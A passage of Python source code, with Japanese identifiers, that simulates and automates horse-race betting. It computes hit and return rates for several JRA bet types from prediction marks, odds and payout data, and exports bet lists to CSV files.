mark_df[\"mark_text\"].str[12:14]\n mark_df.loc[:, \"05\"] = mark_df[\"mark_text\"].str[14:16]\n mark_df.loc[:, \"06\"] = mark_df[\"mark_text\"].str[16:18]\n mark_df.loc[:, \"07\"] = mark_df[\"mark_text\"].str[18:20]\n mark_df.loc[:, \"08\"] = mark_df[\"mark_text\"].str[20:22]\n mark_df.loc[:, \"09\"] = mark_df[\"mark_text\"].str[22:24]\n mark_df.loc[:, \"10\"] = mark_df[\"mark_text\"].str[24:26]\n mark_df.loc[:, \"11\"] = mark_df[\"mark_text\"].str[26:28]\n mark_df.loc[:, \"12\"] = mark_df[\"mark_text\"].str[28:30]\n mark_df.loc[:, \"13\"] = mark_df[\"mark_text\"].str[30:32]\n mark_df.loc[:, \"14\"] = mark_df[\"mark_text\"].str[32:34]\n mark_df.loc[:, \"15\"] = mark_df[\"mark_text\"].str[34:36]\n mark_df.loc[:, \"16\"] = mark_df[\"mark_text\"].str[36:38]\n mark_df.loc[:, \"17\"] = mark_df[\"mark_text\"].str[38:40]\n mark_df.loc[:, \"18\"] = mark_df[\"mark_text\"].str[40:42]\n uma_mark_df = mark_df[[\"RACE_KEY\", \"01\", \"02\", \"03\", \"04\", \"05\", \"06\", \"07\", \"08\", \"09\", \"10\", \"11\", \"12\", \"13\", \"14\", \"15\", \"16\", \"17\", \"18\"]].copy().set_index(\"RACE_KEY\")\n uma_mark_df = uma_mark_df.stack()\n uma_mark_df = uma_mark_df.reset_index()\n uma_mark_df.columns = [\"RACE_KEY\", \"UMABAN\", \"印\"]\n return uma_mark_df.copy()\n\n def replace_line(self, line):\n import unicodedata\n count = 0\n new_line = ''\n for c in line:\n if unicodedata.east_asian_width(c) in 'FWA':\n new_line += c + ' '\n count += 2\n else:\n new_line += c\n count += 1\n return new_line\n\nclass Simlation(CreateFile):\n def __init__(self, start_date, end_date, term_start_date, term_end_date, test_flag):\n self.start_date = start_date\n self.end_date = end_date\n self.test_flag = test_flag\n self.dict_path = mc.return_jra_path(test_flag)\n self.target_path = mc.TARGET_PATH\n self.ext_score_path = self.target_path + 'ORIGINAL_DATA/'\n self.ld = self._get_load_object(\"dummy\", start_date, end_date, False, test_flag)\n self._set_base_df(term_start_date, term_end_date)\n\n def _get_load_object(self, version_str, start_date, end_date, mock_flag, test_flag):\n ld = Ld(version_str, start_date, end_date, mock_flag, test_flag)\n return ld\n\n def _set_base_df(self, term_start_date, term_end_date):\n self.ld.set_race_df()\n self.ld.set_race_file_df()\n self.ld.set_target_mark_df()\n self.ld.set_target_race_mark()\n self.ld.set_haraimodoshi_df()\n base_term_df = self.ld.race_df.query(f\"NENGAPPI >= '{term_start_date}' and NENGAPPI <= '{term_end_date}'\")[[\"RACE_KEY\"]].copy()\n self.res_raceuma_df = self.ld.ext.get_raceuma_table_base()[[\"RACE_KEY\", \"UMABAN\", \"着順\", \"確定単勝オッズ\", \"確定単勝人気順位\", \"レース脚質\", \"単勝\", \"複勝\", \"テン指数結果順位\", \"上がり指数結果順位\"]].copy()\n self.race_df = self.ld.race_df[[\"RACE_KEY\", \"場コード\", \"距離\", \"芝ダ障害コード\", \"種別\", \"条件\", \"天候コード\", \"芝馬場状態コード\", \"ダ馬場状態コード\", \"COURSE_KEY\", \"target_date\", \"距離グループ\", \"非根幹\"]].copy()\n self.race_df.loc[:, \"年月\"] = self.race_df[\"target_date\"].str[0:6]\n self.race_df = pd.merge(self.race_df, self.ld.race_mark_df, on =\"RACE_KEY\")\n self.race_df = pd.merge(self.race_df, base_term_df, on=\"RACE_KEY\")\n self.target_mark_df = self.ld.target_mark_df.copy()\n self.target_mark_df = pd.merge(self.target_mark_df, base_term_df, on=\"RACE_KEY\")\n self.haraimodoshi_dict = self.ld.dict_haraimodoshi\n\n def get_sim_tanpuku_df(self, uma1_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"])\n self.ld.set_odds_df(\"馬連\")\n odds_df = self.ld.odds_df[[\"RACE_KEY\", \"UMABAN\", \"単勝オッズ\", \"複勝オッズ\"]]\n target_df = pd.merge(add_uma1_df, odds_df, on=[\"RACE_KEY\", \"UMABAN\"])\n target_df = pd.merge(target_df, self.race_df, on=\"RACE_KEY\")\n return target_df\n\n def calc_tanpuku_result(self, target_df):\n total_count = len(target_df.index)\n if total_count == 0:\n return pd.Series()\n race_count = len(target_df[\"RACE_KEY\"].drop_duplicates())\n uma1_count = len(target_df[[\"RACE_KEY\", \"UMABAN\"]].drop_duplicates().index)\n tansho_hit = len(target_df.query(\"単勝 != 0\").index)\n fukusho_hit = len(target_df.query(\"複勝 != 0\").index)\n tansho_hit_rate = round(tansho_hit / uma1_count * 100, 1)\n fukusho_hit_rate = round(fukusho_hit / uma1_count * 100, 1)\n race_tansho_hit_rate = round(tansho_hit / race_count * 100, 1)\n race_fukusho_hit_rate = round(fukusho_hit / race_count * 100, 1)\n tan_return_qua = target_df.query(\"単勝 != 0\")[\"単勝\"].quantile(q=[0, 0.25, 0.5, 0.75, 1])\n tan_return_min = round(tan_return_qua[0])\n tan_return_25 = round(tan_return_qua[0.25])\n tan_return_med = round(tan_return_qua[0.50])\n tan_return_75 = round(tan_return_qua[0.75])\n tan_return_max = round(tan_return_qua[1])\n tan_return_all = round(target_df[\"単勝\"].sum())\n tan_return_avg = round(target_df[\"単勝\"].mean(),1)\n fuku_return_qua = target_df.query(\"複勝 != 0\")[\"複勝\"].quantile(q=[0, 0.25, 0.5, 0.75, 1])\n fuku_return_min = round(fuku_return_qua[0])\n fuku_return_25 = round(fuku_return_qua[0.25])\n fuku_return_med = round(fuku_return_qua[0.50])\n fuku_return_75 = round(fuku_return_qua[0.75])\n fuku_return_max = round(fuku_return_qua[1])\n fuku_return_all = round(target_df[\"複勝\"].sum())\n fuku_return_avg = round(target_df[\"複勝\"].mean(),1)\n res_sr = pd.Series({\"総数\": uma1_count, \"レース数\": race_count,\n \"単勝的中数\": tansho_hit, \"単勝的中率\": tansho_hit_rate, \"単勝的中R率\": race_tansho_hit_rate, \"単勝払戻総額\": tan_return_all, \"単勝回収率\": tan_return_avg,\n \"複勝的中数\": fukusho_hit, \"複勝的中率\": fukusho_hit_rate, \"複勝的中R率\": race_fukusho_hit_rate, \"複勝払戻総額\": fuku_return_all, \"複勝回収率\": fuku_return_avg,\n \"単勝最低配当\": tan_return_min, \"単勝配当25%\": tan_return_25, \"単勝配当中央値\": tan_return_med, \"単勝配当75%\": tan_return_75, \"単勝最高配当\": tan_return_max,\n \"複勝最低配当\": fuku_return_min, \"複勝配当25%\": fuku_return_25, \"複勝配当中央値\": fuku_return_med, \"複勝配当75%\": fuku_return_75, \"複勝最���配当\": fuku_return_max})\n return res_sr\n\n def get_sim_umaren_df(self, uma1_df, uma2_df):\n target_df = self.get_umaren_target_df(uma1_df, uma2_df)\n result_df = self.haraimodoshi_dict[\"umaren_df\"]\n target_df = pd.merge(target_df, result_df, on=\"RACE_KEY\")\n target_df.loc[:, \"馬1結果\"] = target_df.apply(lambda x: True if x[\"UMABAN_1\"] in x[\"UMABAN\"] else False, axis=1)\n target_df.loc[:, \"馬2結果\"] = target_df.apply(lambda x: True if x[\"UMABAN_2\"] in x[\"UMABAN\"] else False, axis=1)\n target_df.loc[:, \"結果\"] = target_df.apply(lambda x: x[\"払戻\"] if x[\"馬1結果\"] and x[\"馬2結果\"] else 0, axis=1)\n return target_df\n\n def get_umaren_target_df(self, uma1_df, uma2_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"_1\").rename(columns={\"RACE_KEY_1\":\"RACE_KEY\"})\n add_uma2_df = pd.merge(uma2_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"_2\").rename(columns={\"RACE_KEY_2\":\"RACE_KEY\"})\n self.ld.set_odds_df(\"馬連\")\n odds_df = self.ld.odds_df\n base_uma1_df = pd.merge(uma1_df[[\"RACE_KEY\", \"UMABAN\"]], odds_df, on=[\"RACE_KEY\", \"UMABAN\"]).set_index([\"RACE_KEY\", \"UMABAN\"])\n umaren_uma1_df = base_uma1_df[['馬連オッズ01', '馬連オッズ02', '馬連オッズ03', '馬連オッズ04', '馬連オッズ05', '馬連オッズ06', '馬連オッズ07', '馬連オッズ08', '馬連オッズ09',\n '馬連オッズ10', '馬連オッズ11', '馬連オッズ12', '馬連オッズ13', '馬連オッズ14', '馬連オッズ15', '馬連オッズ16', '馬連オッズ17', '馬連オッズ18']].copy()\n umaren_uma1_df.columns = [\"01\", \"02\", \"03\", \"04\", \"05\", \"06\", \"07\", \"08\", \"09\", \"10\", \"11\", \"12\", \"13\", \"14\", \"15\", \"16\", \"17\", \"18\"]\n umaren_uma1_df = umaren_uma1_df.stack().reset_index()\n umaren_uma1_df.columns = [\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\", \"オッズ\"]\n #umaren_uma1_df = umaren_uma1_df.astype({\"RACE_KEY\": 'str', \"UMABAN_1\": 'str', \"UMABAN_2\": 'str'})\n target_df = pd.merge(umaren_uma1_df, self.race_df, on=\"RACE_KEY\")\n target_df = pd.merge(target_df, add_uma1_df, on=[\"RACE_KEY\", \"UMABAN_1\"])\n target_df = pd.merge(target_df, add_uma2_df, on=[\"RACE_KEY\", \"UMABAN_2\"])\n target_df = target_df.drop_duplicates(subset=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"])\n return target_df\n\n def calc_umaren_result(self, target_df):\n target_df = target_df.query(\"UMABAN_1 != UMABAN_2\").copy()\n total_count = len(target_df.index)\n if total_count == 0:\n return pd.Series()\n race_count = len(target_df[\"RACE_KEY\"].drop_duplicates())\n uma1_count = len(target_df[[\"RACE_KEY\", \"UMABAN_1\"]].drop_duplicates().index)\n uma1_hit = len(target_df.query(\"馬1結果 == True\")[[\"RACE_KEY\", \"UMABAN_1\"]].drop_duplicates().index)\n uma2_count = len(target_df[[\"RACE_KEY\", \"UMABAN_2\"]].drop_duplicates().index)\n uma2_hit = len(target_df.query(\"馬2結果 == True\")[[\"RACE_KEY\", \"UMABAN_2\"]].drop_duplicates().index)\n all_hit = len(target_df.query(\"馬1結果 == True and 馬2結果 == True\")[[\"RACE_KEY\", \"UMABAN_2\"]].drop_duplicates().index)\n uma1_hit_rate = round(uma1_hit / uma1_count * 100, 1)\n uma2_hit_rate = round(uma2_hit / uma2_count * 100, 1)\n all_hit_rate = round(all_hit / total_count * 100, 1)\n race_hit_rate = round(all_hit / race_count * 100, 1)\n return_qua = target_df.query(\"結果 != 0\")[\"結果\"].quantile(q=[0, 0.25, 0.5, 0.75, 1])\n return_min = round(return_qua[0])\n return_25 = round(return_qua[0.25])\n return_med = round(return_qua[0.50])\n return_75 = round(return_qua[0.75])\n return_max = round(return_qua[1])\n return_all = round(target_df[\"結果\"].sum())\n return_avg = round(target_df[\"結果\"].mean(),1)\n res_sr = pd.Series({\"総数\": total_count, \"レース数\": race_count, \"馬1総数\": uma1_count, \"馬1的中数\": uma1_hit, \"馬1的中率\": uma1_hit_rate,\n \"馬2総数\": uma2_count, \"馬2的中数\": uma2_hit, \"馬2的中率\": uma2_hit_rate, \"的中数\": all_hit, \"的中率\": all_hit_rate,\n \"レース的中率\": race_hit_rate, \"回収率\": return_avg, \"払戻総額\": return_all, \"最低配当\": return_min,\n \"配当25%\": return_25, \"配当中央値\": return_med, \"配当75%\": return_75, \"最高配当\": return_max})\n return res_sr\n\n def get_sim_wide_df(self, uma1_df, uma2_df):\n target_df = self.get_wide_target_df(uma1_df, uma2_df)\n result_df = self.haraimodoshi_dict[\"wide_df\"]\n result_df.loc[:, \"UMABAN_1\"] = result_df[\"UMABAN\"].apply(lambda x: x[0])\n result_df.loc[:, \"UMABAN_2\"] = result_df[\"UMABAN\"].apply(lambda x: x[1])\n target_df = pd.merge(target_df, result_df, on=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"], how='left')\n target_df.loc[:, \"馬1結果\"] = target_df.apply(lambda x: True if x[\"UMABAN\"] == x[\"UMABAN\"] else False, axis=1)\n target_df.loc[:, \"馬2結果\"] = target_df.apply(lambda x: True if x[\"UMABAN\"] == x[\"UMABAN\"] else False, axis=1)\n target_df.loc[:, \"結果\"] = target_df.apply(lambda x: x[\"払戻\"] if x[\"馬1結果\"] and x[\"馬2結果\"] else 0, axis=1)\n return target_df.fillna(0)\n\n def get_wide_target_df(self, uma1_df, uma2_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"1\").rename(\n columns={\"RACE_KEY1\": \"RACE_KEY\"})\n add_uma2_df = pd.merge(uma2_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"2\").rename(\n columns={\"RACE_KEY2\": \"RACE_KEY\"})\n base_df = pd.merge(add_uma1_df, add_uma2_df, on=\"RACE_KEY\")\n base_df = base_df.query(\"UMABAN1 != UMABAN2\")\n base_df.loc[:, \"UMABAN_bet\"] = base_df.apply(lambda x: sorted([x[\"UMABAN1\"], x[\"UMABAN2\"]]), axis=1)\n base_df.loc[:, \"UMABAN_1\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[0])\n base_df.loc[:, \"UMABAN_2\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[1])\n self.ld.set_odds_df(\"ワイド\")\n odds_df = self.ld.odds_df\n target_df = pd.merge(base_df, odds_df, on=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"])\n target_df = pd.merge(target_df, self.race_df, on=[\"RACE_KEY\", \"target_date\"])\n target_df = target_df.drop_duplicates(subset=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"])\n target_df = target_df.rename(columns={\"ワイドオッズ\": \"オッズ\"})\n return target_df\n\n def calc_wide_result(self, target_df):\n total_count = len(target_df.index)\n if total_count == 0:\n return pd.Series()\n race_count = len(target_df[\"RACE_KEY\"].drop_duplicates())\n uma1_count = len(target_df[[\"RACE_KEY\", \"UMABAN1\"]].drop_duplicates().index)\n uma1_hit = len(target_df.query(\"馬1結果 == True\")[[\"RACE_KEY\", \"UMABAN1\"]].drop_duplicates().index)\n uma2_count = len(target_df[[\"RACE_KEY\", \"UMABAN2\"]].drop_duplicates().index)\n uma2_hit = len(target_df.query(\"馬2結果 == True\")[[\"RACE_KEY\", \"UMABAN2\"]].drop_duplicates().index)\n all_hit = len(target_df.query(\"馬1結果 == True and 馬2結果 == True\")[\n [\"RACE_KEY\", \"UMABAN_2\"]].drop_duplicates().index)\n uma1_hit_rate = round(uma1_hit / uma1_count * 100, 1)\n uma2_hit_rate = round(uma2_hit / uma2_count * 100, 1)\n all_hit_rate = round(all_hit / total_count * 100, 1)\n race_hit_rate = round(all_hit / race_count * 100, 1)\n return_qua = target_df.query(\"結果 != 0\")[\"結果\"].quantile(q=[0, 0.25, 0.5, 0.75, 1])\n return_min = round(return_qua[0])\n return_25 = round(return_qua[0.25])\n return_med = round(return_qua[0.50])\n return_75 = round(return_qua[0.75])\n return_max = round(return_qua[1])\n return_all = round(target_df[\"結果\"].sum())\n return_avg = round(target_df[\"結果\"].mean(), 1)\n res_sr = pd.Series(\n {\"総数\": total_count, \"レース数\": race_count, \"馬1総数\": uma1_count, \"馬1的中数\": uma1_hit, \"馬1的中率\": uma1_hit_rate,\n \"馬2総数\": uma2_count, \"馬2的中数\": uma2_hit, \"馬2的中率\": uma2_hit_rate, \"的中数\": all_hit, \"的中率\": all_hit_rate,\n \"レース的中率\": race_hit_rate, \"回収率\": return_avg, \"払戻総額\": return_all, \"最低配当\": return_min,\n \"配当25%\": return_25, \"配当中央値\": return_med, \"配当75%\": return_75, \"最高配当\": return_max})\n return res_sr\n\n def get_sim_umatan_df(self, uma1_df, uma2_df):\n target_df = self.get_umatan_target_df(uma1_df, uma2_df)\n result_df = self.haraimodoshi_dict[\"umatan_df\"]\n target_df = pd.merge(target_df, result_df, on=\"RACE_KEY\")\n target_df.loc[:, \"馬1結果\"] = target_df.apply(lambda x: True if x[\"UMABAN_1\"] == x[\"UMABAN\"][0] else False, axis=1)\n target_df.loc[:, \"馬2結果\"] = target_df.apply(lambda x: True if x[\"UMABAN_2\"] == x[\"UMABAN\"][1] else False, axis=1)\n target_df.loc[:, \"結果\"] = target_df.apply(lambda x: x[\"払戻\"] if x[\"馬1結果\"] and x[\"馬2結果\"] else 0, axis=1)\n return target_df\n\n def get_umatan_target_df(self, uma1_df, uma2_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"_1\").rename(\n columns={\"RACE_KEY_1\": \"RACE_KEY\"})\n add_uma2_df = pd.merge(uma2_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"_2\").rename(\n columns={\"RACE_KEY_2\": \"RACE_KEY\"})\n base_df = pd.merge(add_uma1_df, add_uma2_df, on=\"RACE_KEY\")\n base_df = base_df.query(\"UMABAN_1 != UMABAN_2\")\n self.ld.set_odds_df(\"馬単\")\n odds_df = self.ld.odds_df\n target_df = pd.merge(base_df, odds_df, on=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"])\n target_df = pd.merge(target_df, self.race_df, on=[\"RACE_KEY\", \"target_date\"])\n target_df = target_df.rename(columns={\"馬単オッズ\": \"オッズ\"})\n return target_df\n\n def calc_umatan_result(self, target_df):\n total_count = len(target_df.index)\n if total_count == 0:\n return pd.Series()\n race_count = len(target_df[\"RACE_KEY\"].drop_duplicates())\n uma1_count = len(target_df[[\"RACE_KEY\", \"UMABAN_1\"]].drop_duplicates().index)\n uma1_hit = len(target_df.query(\"馬1結果 == True\")[[\"RACE_KEY\", \"UMABAN_1\"]].drop_duplicates().index)\n uma2_count = len(target_df[[\"RACE_KEY\", \"UMABAN_2\"]].drop_duplicates().index)\n uma2_hit = len(target_df.query(\"馬2結果 == True\")[[\"RACE_KEY\", \"UMABAN_2\"]].drop_duplicates().index)\n all_hit = len(target_df.query(\"馬1結果 == True and 馬2結果 == True\")[\n [\"RACE_KEY\", \"UMABAN_2\"]].drop_duplicates().index)\n uma1_hit_rate = round(uma1_hit / uma1_count * 100, 1)\n uma2_hit_rate = round(uma2_hit / uma2_count * 100, 1)\n all_hit_rate = round(all_hit / total_count * 100, 1)\n race_hit_rate = round(all_hit / race_count * 100, 1)\n return_qua = target_df.query(\"結果 != 0\")[\"結果\"].quantile(q=[0, 0.25, 0.5, 0.75, 1])\n return_min = round(return_qua[0])\n return_25 = round(return_qua[0.25])\n return_med = round(return_qua[0.50])\n return_75 = round(return_qua[0.75])\n return_max = round(return_qua[1])\n return_all = round(target_df[\"結果\"].sum())\n return_avg = round(target_df[\"結果\"].mean(), 1)\n res_sr = pd.Series(\n {\"総数\": total_count, \"レース数\": race_count, \"馬1総数\": uma1_count, \"馬1的中数\": uma1_hit, \"馬1的中率\": uma1_hit_rate,\n \"馬2総数\": uma2_count, \"馬2的中数\": uma2_hit, \"馬2的中率\": uma2_hit_rate, \"的中数\": all_hit, \"的中率\": all_hit_rate,\n \"レース的中率\": race_hit_rate, \"回収率\": return_avg, \"払戻総額\": return_all, \"最低配当\": return_min,\n \"配当25%\": return_25, \"配当中央値\": return_med, \"配当75%\": return_75, \"最高配当\": return_max})\n return res_sr\n\n def get_sim_sanrenpuku_df(self, uma1_df, uma2_df, uma3_df):\n target_df = self.get_sanrenpuku_target_df(uma1_df, uma2_df, uma3_df)\n result_df = self.haraimodoshi_dict[\"sanrenpuku_df\"]\n target_df = pd.merge(target_df, result_df, on=\"RACE_KEY\")\n target_df.loc[:, \"馬1結果\"] = target_df.apply(lambda x: True if x[\"UMABAN1\"] in x[\"UMABAN\"] else False, axis=1)\n target_df.loc[:, \"馬2結果\"] = target_df.apply(lambda x: True if x[\"UMABAN2\"] in x[\"UMABAN\"] else False, axis=1)\n target_df.loc[:, \"馬3結果\"] = target_df.apply(lambda x: True if x[\"UMABAN3\"] in x[\"UMABAN\"] else False, axis=1)\n target_df.loc[:, \"結果\"] = target_df.apply(lambda x: x[\"払戻\"] if x[\"馬1結果\"] and x[\"馬2結果\"] and x[\"馬3結果\"] else 0, axis=1)\n return target_df\n\n def get_sanrenpuku_target_df(self, uma1_df, uma2_df, uma3_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"1\").rename(columns={\"RACE_KEY1\":\"RACE_KEY\"})\n add_uma2_df = pd.merge(uma2_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"2\").rename(columns={\"RACE_KEY2\":\"RACE_KEY\"})\n add_uma3_df = pd.merge(uma3_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"3\").rename(columns={\"RACE_KEY3\":\"RACE_KEY\"})\n base_df = pd.merge(add_uma1_df, add_uma2_df, on=\"RACE_KEY\")\n base_df = pd.merge(base_df, add_uma3_df, on=\"RACE_KEY\")\n base_df = base_df.query(\"(UMABAN1 != UMABAN2) and (UMABAN2 != UMABAN3) and (UMABAN3) != (UMABAN1)\")\n base_df.loc[:, \"UMABAN_bet\"] = base_df.apply(lambda x: sorted([x[\"UMABAN1\"], x[\"UMABAN2\"], x[\"UMABAN3\"]]), axis=1)\n base_df.loc[:, \"UMABAN_1\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[0])\n base_df.loc[:, \"UMABAN_2\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[1])\n base_df.loc[:, \"UMABAN_3\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[2])\n self.ld.set_odds_df(\"三連複\")\n odds_df = self.ld.odds_df\n target_df = pd.merge(base_df, odds_df, on=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\", \"UMABAN_3\"])\n target_df = pd.merge(target_df, self.race_df, on=[\"RACE_KEY\", \"target_date\"])\n target_df = target_df.drop_duplicates(subset=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\", \"UMABAN_3\"])\n target_df = target_df.rename(columns={\"3連複オッズ\": \"オッズ\"})\n return target_df\n\n def calc_sanrenpuku_result(self, target_df):\n total_count = len(target_df.index)\n if total_count == 0:\n return pd.Series()\n race_count = len(target_df[\"RACE_KEY\"].drop_duplicates())\n uma1_count = len(target_df[[\"RACE_KEY\", \"UMABAN1\"]].drop_duplicates().index)\n uma1_hit = len(target_df.query(\"馬1結果 == True\")[[\"RACE_KEY\", \"UMABAN1\"]].drop_duplicates().index)\n uma2_count = len(target_df[[\"RACE_KEY\", \"UMABAN2\"]].drop_duplicates().index)\n uma2_hit = len(target_df.query(\"馬2結果 == True\")[[\"RACE_KEY\", \"UMABAN2\"]].drop_duplicates().index)\n uma3_count = len(target_df[[\"RACE_KEY\", \"UMABAN3\"]].drop_duplicates().index)\n uma3_hit = len(target_df.query(\"馬3結果 == True\")[[\"RACE_KEY\", \"UMABAN3\"]].drop_duplicates().index)\n all_hit = len(target_df.query(\"馬1結果 == True and 馬2結果 == True and 馬3結果 == True\")[[\"RACE_KEY\", \"UMABAN_2\"]].drop_duplicates().index)\n uma1_hit_rate = round(uma1_hit / uma1_count * 100, 1)\n uma2_hit_rate = round(uma2_hit / uma2_count * 100, 1)\n uma3_hit_rate = round(uma3_hit / uma3_count * 100, 1)\n all_hit_rate = round(all_hit / total_count * 100, 1)\n race_hit_rate = round(all_hit / race_count * 100, 1)\n return_qua = target_df.query(\"結果 != 0\")[\"結果\"].quantile(q=[0, 0.25, 0.5, 0.75, 1])\n return_min = round(return_qua[0])\n return_25 = round(return_qua[0.25])\n return_med = round(return_qua[0.50])\n return_75 = round(return_qua[0.75])\n return_max = round(return_qua[1])\n return_all = round(target_df[\"結果\"].sum())\n return_avg = round(target_df[\"結果\"].mean(),1)\n res_sr = pd.Series({\"総数\": total_count, \"レース数\": race_count, \"馬1総数\": uma1_count, \"馬1的中数\": uma1_hit, \"馬1的中率\": uma1_hit_rate,\n \"馬2総数\": uma2_count, \"馬2的中数\": uma2_hit, \"馬2的中率\": uma2_hit_rate, \"馬3総数\": uma3_count, \"馬3的中数\": uma3_hit,\n \"馬3的中率\": uma3_hit_rate, \"的中数\": all_hit, \"的中率\": all_hit_rate,\n \"レース的中率\": race_hit_rate, \"回収率\": return_avg, \"払戻総額\": return_all, \"最低配当\": return_min,\n \"配当25%\": return_25, \"配当中央値\": return_med, \"配当75%\": return_75, \"最高配当\": return_max})\n return res_sr\n\n\n\nclass AutoVote(Simlation):\n def _set_base_df(self, term_start_date, term_end_date):\n self.auto_bet_path = self.target_path + 'AUTO_BET/'\n self.ld.set_race_df()\n self.ld.set_race_file_df()\n self.ld.set_target_mark_df()\n self.ld.set_target_race_mark()\n base_term_df = self.ld.race_df.query(f\"NENGAPPI >= '{term_start_date}' and NENGAPPI <= '{term_end_date}'\")[[\"RACE_KEY\"]].copy()\n self.res_raceuma_df = self.ld.ext.get_raceuma_before_table_base()[[\"RACE_KEY\", \"UMABAN\"]].copy()\n self.race_df = self.ld.race_df[[\"RACE_KEY\", \"場コード\", \"距離\", \"芝ダ障害コード\", \"種別\", \"条件\", \"天候コード\", \"芝馬場状態コード\", \"ダ馬場状態コード\", \"COURSE_KEY\", \"target_date\", \"距離グループ\", \"非根幹\"]].copy()\n self.race_df = pd.merge(self.race_df, self.ld.race_mark_df, on =\"RACE_KEY\")\n self.race_df = pd.merge(self.race_df, base_term_df, on=\"RACE_KEY\")\n self.target_mark_df = self.ld.target_mark_df.copy()\n self.target_mark_df = pd.merge(self.target_mark_df, base_term_df, on=\"RACE_KEY\")\n\n def export_bet_csv(self):\n target_df = self.target_mark_df.copy()\n tansho_ipat_bet_df, tansho_target_bet_df = self.get_tansho_bet_df(target_df)\n fukusho_ipat_bet_df, fukusho_target_bet_df = self.get_fukusho_bet_df(target_df)\n umaren_ipat_bet_df, umaren_target_bet_df = self.get_umaren_bet_df(target_df, target_df)\n umatan_ipat_bet_df, umatan_target_bet_df = self.get_umatan_bet_df(target_df, target_df)\n wide_ipat_bet_df, wide_target_bet_df = self.get_wide_bet_df(target_df, target_df)\n sanrenpuku_uma1_df = target_df.query(\"印 == '◎ '\").copy()\n sanrenpuku_uma2_df = target_df.query(\"印 in ['× ', '△ ', '▲ ', '○ ']\").copy()\n sanrenpuku_uma3_df = target_df.query(\"印 != '◎ '\").copy()\n sanrenpuku_ipat_bet_df, sanrenpuku_target_bet_df = self.get_sanrenpuku_bet_df(sanrenpuku_uma1_df, sanrenpuku_uma2_df, sanrenpuku_uma3_df)\n ipat_bet_df = pd.concat([tansho_ipat_bet_df, fukusho_ipat_bet_df, umaren_ipat_bet_df, umatan_ipat_bet_df, wide_ipat_bet_df, sanrenpuku_ipat_bet_df])\n ipat_bet_df.to_csv(self.auto_bet_path + \"ipat_bet.csv\", index=False, header=False)\n target_bet_df = pd.concat([tansho_target_bet_df, fukusho_target_bet_df, umaren_target_bet_df, umatan_target_bet_df, wide_target_bet_df, sanrenpuku_target_bet_df])\n target_bet_df = target_bet_df.sort_values([\"RACE_ID\", \"エリア\", \"券種\", \"購入金額\", \"目1\", \"目2\", \"目3\"])\n target_bet_df.to_csv(self.auto_bet_path + \"target_bet.csv\", index=False, header=False)\n\n def get_tansho_bet_df(self, target_df):\n tansho_base_df = self.get_sim_tanpuku_df(target_df)\n bet_df = tansho_base_df.query(\"印 in ['△ ', '▲ ', '○ ', '◎ '] and 勝 in ['☆ ','▲ ', '○ ', '◎ '] and 単勝オッズ >= 10\").copy()\n bet_df.loc[:, \"コード\"] =bet_df[\"UMABAN\"]\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN\"]\n bet_df.loc[:, \"目2\"] =\"\"\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"馬券式\"] = \"TANSYO\"\n bet_df.loc[:, \"券種\"] = '0'\n bet_df.loc[:, \"オッズ\"] = bet_df[\"単勝オッズ\"]\n ipat_bet_df = self._get_ipatgo_bet_df(bet_df)\n target_bet_df = self._get_target_bet_df(bet_df)\n return ipat_bet_df, target_bet_df\n\n def get_fukusho_bet_df(self, target_df):\n tansho_base_df = self.get_sim_tanpuku_df(target_df)\n bet_df = tansho_base_df.query(\"印 in ['△ ', '▲ ', '○ ', '◎ '] and 軸 in ['☆ ', '○ ', '◎ '] and 複勝オッズ >= 5 and レース印 != '000000'\").copy()\n bet_df.loc[:, \"コード\"] =bet_df[\"UMABAN\"]\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN\"]\n bet_df.loc[:, \"目2\"] =\"\"\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"馬券式\"] = \"FUKUSHO\"\n bet_df.loc[:, \"券種\"] = '1'\n bet_df.loc[:, \"オッズ\"] = bet_df[\"複勝オッズ\"]\n ipat_bet_df = self._get_ipatgo_bet_df(bet_df)\n target_bet_df = self._get_target_bet_df(bet_df)\n return ipat_bet_df, target_bet_df\n\n def get_umaren_bet_df(self, uma1_df, uma2_df):\n umaren_base_df = self.get_umaren_target_df(uma1_df, uma2_df)\n bet_df = umaren_base_df.query(\n \"印_1 == '◎ ' and 印_2 in ['△ ', '▲ ', '○ '] and 軸_1 != '◎ ' and 軸_2 not in ['◎ ', '▲ '] and オッズ >= 50\").copy()\n bet_df.loc[:, \"コード\"] =bet_df.apply(lambda x: x[\"UMABAN_1\"] + \"-\" + x[\"UMABAN_2\"], axis=1)\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN_1\"]\n bet_df.loc[:, \"目2\"] =bet_df[\"UMABAN_2\"]\n 